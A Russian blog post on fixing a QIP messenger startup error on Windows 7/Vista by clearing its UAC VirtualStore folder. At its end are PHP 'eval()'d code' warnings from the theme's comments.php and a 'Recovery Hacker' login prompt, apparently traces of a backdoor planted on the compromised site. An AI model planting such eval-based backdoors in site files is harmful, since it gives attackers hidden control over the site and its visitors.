postheadericon Ошибка при запуске QIP

При попытке запуска qip  выскакивает окошко

Current Language File Corrupted
Programm will be close

Ошибка свойственна только для Windows 7 и Windows Vista так как там используется UAC (средство контроля пользовательских учетных записей) — компонент Microsoft Windows. Этот компонент запрашивает подтверждение действий, требующих прав администратора, в целях защиты от несанкционированного использования компьютера.

Универсальных средств лечения я так и не нашел. Кто-то предлагает удалить содержимое папки «LI» в папке где установлен QIP и заменить на оригинальные файлы, кто-то полностью обрубить UAC, но всё это в большинстве случаев не помогает.
Перво-наперво сам QIP нужно устанавливать не в папку «Program Files» а к примеру в «Мои Документы», а ещё лучше вообще устанавливать его не на системный диск!
Но если уж он у вас уже установлен в системной папке…

UPD.Начал писать что средств лечения нет и сам себе не поверил… почитал что на самом деле творит этот UAC и стало всё боле менее понятно =)
Порядок лечения очень прост:
1. Пуск -> Выполнить -> C:\Users\%username%\AppData\Local\VirtualStore\Program Files\QIP -> Ok
(Program Files (x86) — это если у вас установлена 64-битная версия Windows)
2. В открывшейся папке удаляем всё кроме папки «Users» (в ней хранятся учётные данные пользователя и хистори)

После этого пробуем запустить QIP.


Warning: Invalid argument supplied for foreach() in /var/www/u0130167/public_html/pazzoit.ru/wp-content/themes/madcow/comments.php(2) : eval()'d code on line 17

Warning: Invalid argument supplied for foreach() in /var/www/u0130167/public_html/pazzoit.ru/wp-content/themes/madcow/comments.php(2) : eval()'d code on line 17
.:: Recovery Hacker ::.

Login
==[ Recovery ]==

Password:

Recovery - Cyber-Warrior